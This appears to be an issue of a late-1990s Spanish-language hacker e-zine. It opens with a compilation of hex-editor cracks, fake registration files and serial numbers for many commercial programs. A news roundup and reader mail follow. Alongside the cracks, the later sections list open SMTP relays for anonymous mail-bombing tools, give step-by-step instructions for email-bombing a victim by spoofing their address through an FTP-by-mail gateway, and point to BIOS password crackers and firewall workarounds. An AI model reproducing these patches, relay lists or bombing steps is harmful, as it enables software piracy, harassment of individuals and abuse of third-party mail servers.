 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 Remueve la defensa harlock
 3DS.EXE
 0005ACD8: 3D B8
 0005ACDD: 74 EB
 0006D282: 56 B8
 0006D283: 68 B2
 0006D284: C8 AA
 0006D285: 27 FE
 0006D286: 03 5B
 0006D287: 00 C3
 000874B9: 3D B8
 000874BE: 74 EB
 0008C0B1: 3D B8
 0008C0B6: 74 EB
 001041A2: 75 90
 001041A3: 12 90
 0011F84A: 56 B8
 0011F84B: 68 4A
 0011F84C: C8 52
 0011F84D: 27 50
 0011F84E: 03 7A
 0011F84F: 00 C3
 00126C92: 56 B8
 00126C93: 68 9E
 00126C94: 68 28
 00126C95: A3 83
 00126C96: 02 45
 00126C97: 00 C3
 00182B8A: 56 B8
 00182B8B: 68 82
 00182B8C: 64 26
 00182B8D: 68 98
 00182B8E: 07 30
 00182B8F: 00 C3

   Aldas (dcx@pub.osf.lt)

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

 Como crackear 4-D Boxin con un Hex-editor:
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Encuentra la siguiente linea en el archivo 4DBMCGA.EXE

  32 B8 05 46
  Conviertela a:
  32 B8 05 0A

  EE 03 E1 05 FD 07 01 08 11 0A 20 0C 31 0E 00 1C 50 00
  Conviertela a:
  D1 03 E0 05 F4 07 00 08 10 0A 27 0C 30 2F 00 1C 50 00

 Cuando veas la cara de un boxer, presiona enter 2 veces.

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

  Como crackear 4OS/2 v.2.51 build 43 (32 bits) con un Hex-editor:
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  Encuentra lo siguiente en el archivo 4os2.exe (219.040 bytes)

  8B 5D E8 83 FB 06 77 25
          Conviertelo a:
  BB 00 00 00 00 90 90 90

 cracked by: Dark Wing

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

 Como crackear Accolade Software con un Hex-editor:
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 Funciona con: 4th& Inches, Test Drive, Fast Break, y otro Accolade software.

 Encuentra:
  55 56 57 06 1E
  cambia a:
  31 C0 C3 06 1E

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

 Como crackear Adept BBS v1.07 para OS/2:
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  Crea un archivo llamado: adeptbbs.reg

  Pon la siguiente informacion dentro de el:

   Name: (20 espacios)          Creeping Death
   Rego No. (17 espacios)       3599887846
   Rego Serial No. (10 espacios)    806949176

  Los espacios son importantes para que funcione el crack.

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

  Como crackear ANSIPLUS v.3.02 con un Hex-editor.
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  Encuentra lo siguiente en el archivo ANSIPLUS.SYS

  Busca:                 56 33 DB 3E 39 82

  Convierte a:           56 33 DB 3E 8B 82


  Busca:                 6C 00 81 C3 A4 00

  Convierte a:           6C 00 81 C3 00 00


  Busca:                 F4 63 97 65 E2 65 39 66 97 65

  Convierte a:           F4 63 97 65 E7 66 E7 66 E7 66

 Por: Johnny Crack

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

 Para hacer que ARJ v2.30 Secure haga chequeos AV haz esto:
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     Cambia los siguientes bytes en arj.exe

     Cambia 3530 de 75/05 a EB/0D
     Cambia 4568 de 75/06 a EB/0C
     Cambia 6555 de 75/06 a EB/0C
                            Y el seguro de ARJ funcionara!

  Agarra un archivo ARJ ya hecho.
  Escribe : ARJ z FILE.ARJ AV (nombre)

  Las direcciones de los bytes estan en DECIMAL !.
  Solo funciona con Arj v2.30

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

 Como registrar BackAlley con un Hex-editor:
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Archivo      : BACKALLY.EXE

 Busca        : A0 40 04

 Cambia a     : B0 01 90

 Por: Krynos

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

 Como crackear BAChurch con un Hex-editor:
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Archivo      : BACHURCH.EXE

 Busca        : A0 30 04

 Cambia a     : B0 01 90

 Por: Krynos

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

 Como crackear Buttons 4 Dos 6.0:
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 1. Abre un editor de textos (MS-Edit)
 2. Abre el archivo Buttons.ini
 3. Veras esta linea:

 ".. Register                                Y        "

 Limpia Register y pon tu nombre.

 Ejemplo:

 ".. RareGaZz                                Y        "

 Salva el archivo.

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

 Como crackear CD-Maker Pro v.1.2 para Windows(95) con un Hex-editor:
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 CDMAKER.exe
 BD14B    74 --> EB
 BD14C    03 --> 3B

 CDCOPY.exe
 0B01F    04 --> 00
 1965F    75 --> EB

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

  CD MASTER 3.1
  ~~~~~~~~~~~~~
  Crea un archivo de nombre CDPLAYER.REG
  y con un Hex-Editor pon estos comandos:

  4F 4B 57 41 52 45 0D 0A 35 34 43 03 0D 0A

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

 Como crackear Cool Edit v1.51:
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 En la pantalla de registro escribe tu nombre y pon como numero de serie
 _ ANSWERME _. Cool Edit te dira que numero de serie es.

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

 Registro para Cooledit para Windows 95.
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Copia el archivo cool.ini a tu directorio de windows y edita:

 [Registration]
 Garbleflux=5397
 User=The Free Debugger / Dementia
 Number=DEMENTIA

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

 Como crackear Dbase v4.11 con un Hex-editor:
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  Archivo      : INSTALL.EXE

  Busca        : 74 1A FF 46 FE

  Cambia a     : EB 1A FF 46 FE

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

 Como crackear GifLite v2.0 con un Hex-editor:
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Archivo       : Giflite.exe

 Busca         : C6 06 F3 00 01 C4

 Cambia a      : C6 06 F3 00 00 C4

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

  Como crackear GRAPHIC WORKSHOP 6.1u para DoS:
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  Archivo     : GWSINSTL.EXE
  Busca       : 83 C4 04 3B 06 D0 18 74 IF
  Cambia a    : 83 C4 04 90 A1 D0 18 75 IF

  Archivo     : GWS.EXE
  Busca       : 83 C4 04 3B 06 58 03 75 2C
  Cambia a    : 83 C4 04 90 A1 58 03 74 2C

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

 Como crackear LORDTRX v1.10 con un Hex-editor:
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 Encuentra lo siguiente en LORDTRX.EXE:
  0B C0 75 08 C7 06

 Cambialo a:

  31 C0 75 08 C7 06

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

 NEOPAINT 1.0
 ~~~~~~~~~~~~
  Archivo    : NEOPAINT.EXE

  Busca      : 80 3E 06 07 00

  Cambia a   : C6 06 3E 06 01

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

 Como crackear Paint Shop Pro v3.0 con un Hex-Editor:
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 Busca en PSP.EXE lo siguiente:

  83 C4 02 0B C0 74 0D
  Cambialo a:
  88 26 86 00 90 EB 2D

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

  Como crackear The Draw con un Hex-editor:
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  Archivo       : TheDraw.exe
  Busca         : 08 C0 74 C2 89 EC 5D CA
  Cambia a      : 08 C0 75 C2 89 EC 5D CA

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

 Como crackear WebEdit v1.4b para Win95
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 Busca en el directorio System de windows el archivo Sysdvrxl.drv y cambiale
 el nombre a cualquier cosa. Listo!

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

CoolEdit96
Codigos de registro

Name: tHATDUDE PC96
Code: HFCMGACK

Name: tHATDUDE PC97
Code: GGRGEGSI

Name: PhRoZeN CReW 97
Code: SIYVBHZE

Name: PhRoZeN CReW
Code: MPULQSZB

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

 ---> Cracks recopilados de internet.




 '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\
 
        ڿ Ŀ   Ŀ       Ŀ       Ŀ Ŀ ڿ       Ŀ Ŀ
                             Ĵ        Ŀ 
                                   
                               By: Groovy Dooby.

 '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

 America Online firmo con Cybermeals (comidas ciberneticas), y para abril
 espera que mas de 25,000 restaurantes puedan entregar comidas ordenadas por
 internet.

 '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

 En la batalla contre el spam (email no solicitado) con America Online, la
 Organizacion de Comercio en Internet (http://www.noic.org/) dice que pondra
 en internet 5 millones de direcciones de email de los usuarios de AOL.
 America Online llama a eso cyber-terrorismo.

 '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

 Hotmail dice tener 9.2 millones de usuarios activos y dicen que pueden pasar
 a America Online (AOL con 10 millones) como numero 1.

 '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

 Microsoft Corp. compro al proveedor de email gratuito Hotmail.

 '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

 Hackers haciendose llamar PANTS/HAGIS entraron al sistema de Yahoo, el sitio
 mas popular de internet, poniendo una nota para la liberacion del Hacker
 Kevin Mitnick y diciendo que cualquier persona que haya usado Yahoo desde
 una terminal de red en el mes pasado tiene una bomba logica en su red.

 '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

 La primer maquina de busqueda amigable con la familia esta en internet.
 Net Shepherd http://family.netshepherd.com/ utilizando AltaVista, dice haber
 `clasificado' un millon y medio de paginas de 500,000 sitios web. No busca
 material no adecuado para la familia y varia en grados que puedes especificar
 mientras buscas. La Fundacion de Libertad Electronica ya la ha atacado.
 http://www2.epic.org/reports/filter_report.html

 '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

 El regalo de ahora: Cosmopolitan's Virtual Makeover CDROM ($40) es un paquete
 que te permite scannear tu foto y cambiarle el estido de peinado, makeup,
 pestaas,etc. Todo en la privacidad del hogar. http://www.virtualmakeover.com

 '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

 IDT Corp. Finalmente saco al mercado Net2Phone Direct, un servicio para hacer
 llamadas por internet a cualquier telefono regular por 8 centavos el minuto.
 Intentalo en 1-800-CALL-IDT http://www.net2phone.com/

 '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

 La conferencia de la Organizacion de las Naciones Unidas sobre el
 calentamiento de la tierra sera la mayor transmision por internet. Se usaran
 16 servidores y mirror sites para mostrar los discursos oficiales y otros
 eventos en 7 lenguajes.

 '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

 La maquina de busqueda Lycos se convirtio en la primera maquina de busqueda
 que empezo a insertar algunas de sus propias paginas como los primeros
 resultados. Otras maquinas lo hacen, pero siempre en los lados. www.lycos.com

 '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

 El controversial filtro de pornografia CyberPatrol esta de nuevo en las
 noticias con la salida de un reporte sobre los sitios bloqueados, incluyendo
 Air Penny (un sitio de Nike), un servicio de atencion a mascotas, El sitio
 de MIT's sobre el proyecto matematico, 90,000 sitios de musica en Geocities,
 WordPlay (antes AT&T's Imagination Network), etc. etc.

 '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

 IBM definitivamente se sale de el gran show en las Vegas COMDEX

 '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

 China sigue poniendo restricciones para el uso de Internet

 '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

 WebTV al parecer llega a Ensenada, Mexicali y Tijuana Baja California Mexico.
 Tel. Ensenada: 738556

 '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

 El pleito entre Microsoft contra el Departamento de Justicia termino. La
 compaia de software y el Gobierno han puesto sus papeles en linea.
 http://www.microsoft.com/corpinfo/doj/doj.htm
 http://www.usdoj.gov/atr/cases3/micros2/micros0.htm

 '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

 Los problemas del ao 2000 estan apareciendo. Visa reporta que, a pesar de
 un tremendo esfuerzo empezado en 1996, 42,000 de los 14 millones de
 establecimientos que aceptan su tarjeta piensan que el ao de caducidad 00 ya
 expiro y no aceptan las tarjetas.

 '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

 Yahoo! lanzara con America Online (AOL) `Yahoo Online' con MCI, mandando por
 correo CDs, etc.

 '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

 (Tomada del diario El Colombiano, Medellin 25-I-98)
 Netscape Communications, la empresa lider de programas para Internet,
 distribuira gratuitamente de ahora en adelante su programa de navegacion en
 Internet, anuncio su presidente y director general, Jim Barksdale. Netscape
 imita asi a su principal rival, el gigante Microsoft, que avanzo
 peligrosamente en parte del mercado. La sociedad de Mountain View(California)
 tambien hara publica la tecnologia de la proxima generacion de su serie de
 programas para Internet, Communicator 5.0, indico Barksdale.

 '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

 Por amenazas de muerte AMNISTIA INTERNACIONAL se va de Colombia (amenazas
 de las fuerzas militares Colombianas obviamente). Un informe de A.I. la
 semana pasada acuso a las F.F.M.M. Colombianas de masacres campesinas y
 violacion de derechos humanos!! (Que fueron negadas por los Militares).

 [ En el mundo no solo hay un Chiapas... :'( ]

 '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

 Toshiba impacto al mercado de las laptop con el primer diseo de costo menor
 a los $2,000 dlls. La Satellite 305CDS, con 16 MB RAM y procesador a 166MHZ
 con modem K56flex, se vende a $1,700. El precio de las laptop se espera que
 baje mas alla de los $1,500 dlls para este verano.

 '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

 El primer virus de hoja de calculo ha aparecido en Francia. El virus "paix.a
 virus" es transmitido en las formulas de las hojas de calculo de Excel. No
 es un virus que dependa en macros como los anteriores.

 '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

 En 1997, por la primera vez, NT se vendio mas que UNIX, y por lo doble.

 '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

 http://www.egghead.com/
 Egghead Software cerrara sus puertas y tratara de vender unicamente en i-net.

 '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

 Mexico ha montado monstruosas Banderas de 164 por 94 pies colgadas de
 gigantescos postes de 109 toneladas como del tamao de tres campos de
 football de altura en tres lugares directamente en la frontera con los
 Estados Unidos Americanos por El Paso, San Diego y Loredo TX. Ninguna de las
 ciudades de Estados Unidos puede justificar el costo de un proyecto de esa
 magnitud para su bandera.

 '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

 http://www.safersmokes.com/
 Para aquellos delicados al tabaco, los cigarros "Bravo" de lechuga son mucho
 mas seguros. De venta en internet a $3.75 dlls. el paquete.

 '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\

 http://www.aidem.com.sg/madonna/frozen.htm
 Warner Brothers esta enojado por que "Frozen" un single del album aun sin
 salir "Ray of Light" ya esta en internet.

 '/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\'/.\




                          .o B 0 0 /\/\ 3 R 4 N G o.
                  `tu linea de comunicacion con el under.'


  *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

 CODIGO DE REGISTRO
 mIRC ver 5.02      name: mIRC Supporter   S/N: 17394-1986741

  *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

         Servidores SMPT para usar con programas como Upyours y Kaboom.
                    (algunos de ellos no imprimen la I.P.)

rome.ccomm.com
wisdom.psinet.net.au 
emout17.mail.aol.com 
mdr.de 
manado.webindonesia.com <------ Bueno.
emout29.mail.aol.com 
from m16.boston.juno.com 
eleventh2.inil.com  <------ Muy rapido.
portland.cbn.net.id 
pnccwg.palaunet.com 
bonn.netsurf.de
server.compunort.com.ar 
mail1-gui.server.virgin.net 
nontri.ku.ac.th 
mail2.isdnet.net 
gandalf.leader.es 
smtp-0.indo.net.id 
sirius.hkstar.com 
triton.worldonline.nl 
brickbat8.mindspring.com 
ieva06.lanet.lv 
www.aiusa.com 
brick.purchase.edu 
rush.u-netsys.com.br
sweden.it.earthlink.net 
SWBELL.net 
elf.ecitele.com 
future.futureone.com 
dinet.de 
enterprise.powerup.com.au 
ns.ezl.com 
zenon.logos.cy.net   
dino.mainz.ibm.de 
out2.ibm.net 
smtp1.wanadoo.fr 
beta.mcit.com 
hp1.p-ol.com 
revere.musc.edu 
alpha.ntu.ac.sg
mail.uniserve.com 
UTMJB.UTM.MY
mimos.my 
deneb.dfn.de 
nontri.ku.ac.th 
weblock.tm.net.my 
mail.secc.cc.ia.us  
main.com2com.ru
mail.ptd.net
lilly.ping.de 
smtp1.erols.com 
crotalus.famu.edu 
mail.uniserve.com   

  *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

 Saludos esta es una pequea manera de optimizar su sistema Win95:

 -En el Panel de Control (Control Panel) selecciona el icono del sistema
 (System) y clickea en Rendimiento (Performance). Luego abre el menu de
 Configuracion de Archivos (File Settings) y en el menu desplegable elige
 la opcion "Network Server". Si tienes un CD-ROM de 8x o mas rapido en las
 opciones del CD-ROM indicale que quieres un cache pequeo (small) y en
 el menu desplegable deberas elegir "No lectura adelantada" (No read-ahead)

 Para acelerar el modem un poco mas para surfear por Internet en el control
 panel clikea el icono de "modems". Luego presiona el boton Propiedades
 (Properties). Pon como maximo de velocidad la maxima velocidad disponible
 - aunque tu modem sea mas lento - y clickea "Conexion" (Connection) y
 despues haz click en el boton izquierdo Configuracion del Puerto (Port
 Settings), marca la unica cajita y pon al maximo la primer opcion y al
 minimo la ultima.


  *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^


Algo de poesia 100% mexicana............

Apasionado y hondamente la quiero a usted jo-
ven hermosa, como es natural yo deseo proce-
der con toda prontitud y eficacia al fin de pre-
sentarla luego en el altar de la iglesia y no enga-
arla vilmente, pues pienso que es usted es la mas pu-
ra, el modelo envidiable de mujer buena y cas-
ta que pueda haber existido.
    
Asimismo, deseo depositar en usted, todo el se-
creto de mi alma e impedir que mis venas se que-
men con ardiente pasion y despues de haber for-
malizado nuestras relaciones y haberle comu-
nicado a su madrecita y hermanitas; quedaria mi ver-
dadera pasion correspondida al fin de que la ha-
ga muy feliz ante tanta emocion.
    
La verdad, le digo, que el mas afortunado cu-
pido, mirandonos con tan ardiente anhe-
lo, envidiaria nuestra dicha pues creame que el co-
nocer la felicidad matrimonial que desea toda mu-
jer es lo mas importante en la vida...

Ahora lean solo las lineas impares. Saludos.

Azumlord
    
  *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

 Cual es el tio que mas largo?
 El guardia civil pues nace en Andalucia y va a morir hasta el pais Vasco.

  *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

  De: Plaxius
  Para: Todos

  Feliz navidad y ao nuevo a todos. Ha sido excelente conocerlos a todos
  los habitantes de internet, a todas las culturas, en fin. A todos!

  *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

 En verdad quieres joder a esa personita bombardeando su direccion de email?
 Pues manda un mensaje a: BITFTP@PUCC.PRINCETON.EDU Con esto en el cuerpo del
 mensaje:

FTP ftp.cdrom.com UUENCODE
USER anonymous
cd /pub/idgames2/quake2/official/
get q2-309.exe
QUIT

 Mandalo como unas cinco veces con intervalos de 10 minutos cada uno y
 recuerda cambiar la direccion origen por la de tu objetivo.

  *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

 Cualquier cracker ahora puede usar telnet para atakar cualquier servidor
 y cualquier puerto sin temor a ser descubierto. Todo esto gracias a Java:

 http://www.netobjective.com/java/telnet.html

  *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

>Con la utilidad para crear diccionarios de palabras para crackear
>passwords he conseguido una buena lista, pero como la utilizo con las
>ventanas de password (especialmente la de acceso a la BIOS)?

 imposible mejor consigue el "bios cracker" haz una busqueda de esa palabra
 en alguna maquina de busqueda y encontraras el archivo. Quizas ya este en la
 seccion de software de RareGaZz

  *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

>- En las Nowhere Utilities, con el comando Cipher puedo encriptar
> archivos pero despues no se como desencriptarlos, he leido las instrucciones
> y dicen que hay que ejecutar el programa de nuevo con la contrasea pero lo
> unico que hace es volverlos a encriptar; como hago para desencriptar?

 Nup! el comando cipher NO ENCRIPTA, CIPHEREA. Codifica un archivo con una
 clave y los descodifica de la misma manera. Vamos intentalo!

 cipher 123 archivo.txt (encriptar)
 cipher 123 archivo.txt (desencriptar)

  *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

>Podriais hacer un articulo explicando con ejemplos cada una de las utilidades
>de Nowhere Man y sus funciones si no es pedir demasiado?

claro que puedo, magnifica idea!

  *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

En un numero de la revista se pedian canales de IRC de habla hispana, yo
he encontrado algunos y espero que a alguien le vengan bien.
NOTA: Todos los canales tienen el puerto 6667

irc.arrakis.es
irc.lleida.net
irc.catalunya.net
irc.servicom.es   => recomendado
irc.encomix.es    => recomendado
irc.ctv.es
irc.jet.es
irc.ergos.es
irc.i3d.es
irc.eui.upv.es
irc.mundivia.es
irc.ibernet.es
irc.lander.es
irc.teleline.es
irc.ceta.es
194.224.67.3
irc.virtualsw.es
irc.amadeus.es
irc.ergos.es
irc.valnet.es
es.undernet.org

  *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

>Es patetica vuestra referencia a los HIJOSDEMALAPUTA de ETA en la revista 009.
>Por favor, no opineis de lo que no conoceis que la cagais nombre del CHE y la
>palabra ZAPATISTAS con la de ETA es denigrar a los dos primeros... QUE
>ATREVIDA ES LA IGNORANCIA!!!!!!!!!!! opinar de lo que sabeis (que sabeis
>mucho, no de lo que desconoceis. Os suena Miguel Angel blanco???? recibio dos
>balas de cal.22 por el simple echo de vivir, sentir y amar. Por lo demas
>seguir asi... vuestra revista es muy buena. Un saludo de Asturcon
>P.D: si quereis hablar del tema de ETA e informaos de lo que ocurre no teneis
>mas que decirlo en vuestra revista.

 ehhhh... nadie dijo que ETA fuera similar o parecido al Che o a los
 Zapatistas. Y bueno, que fue lo que dijimos de ETA?
 " Si ETA dejara de hacer coches bomba, quien se acordaria de ellos? "
 Es o no verdadero!?

  *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

>Queria hacer un comentario sobre una frase que lei en la RaregazZ.
>La frase decia algo asi como...
>
>"Si los de ETA no pusiesen coches bomba, nadie se acordaria de ellos".
>No capto el sentido de la frase, es decir, no se si les apoyais o que...:-?
>
>    Solo quiero decir que los de ETA son los peores seres humanos? de
>la tierra, y por ello no se merecen ni siquiera ser mencionados en este
>fantastico e-zine.... Ya se que en la revista se tratan de temas
>anarquicos, pero lo de ETA no puede meterse dentro de esta calificacion.
>Son unos terroristas HIJOS DE PUTA, y habria que acabar con todos ellos...
>VASCOS SI, ETA NO!
>
>    Seguir asi de bien... :-)  Hackerz Rulez!

 La respuesta es la misma que arriba...

  *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

>...otra cosa que queria saber es como se conecta a una bbs ya que soy un
>novato en este campo.

 Usando tu programa de Telnet (si usas windows95 escribe telnet en c:\windows)
 y selecciona conectar, despues escribe sinet.sinet.com.mx y cuando aparezca
 Login: escribe BBS despues te das de alta o entras de invitado. Presionando
 la T(alk) y luego la C(hat) podras platicar con personas de Mexico. En
 ocasiones por ahi puedes encontrarme con mi Nick. Raretrip

  *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

 Aquellos que escriben solicitando la forma de llamar gratis desde telefonos
 de tarjeta por favor manden email a truco haciendo esa pregunta.

  *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^

>pero como entrar a esos tipos de servidores.....si cuando me voy a conectar
>me da un mensaje: fallo en la conexi=n

 Esos servidores estan detras de una firewall o barrera de fuego. Existen
 algunos scripts perl que puedes configurar en tu sistema para poder usar
 telnet o ftp mas alla de la firewall.

